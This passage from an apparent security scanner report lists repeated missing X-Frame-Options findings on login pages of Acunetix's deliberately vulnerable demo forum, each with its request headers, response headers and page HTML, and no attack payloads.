</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
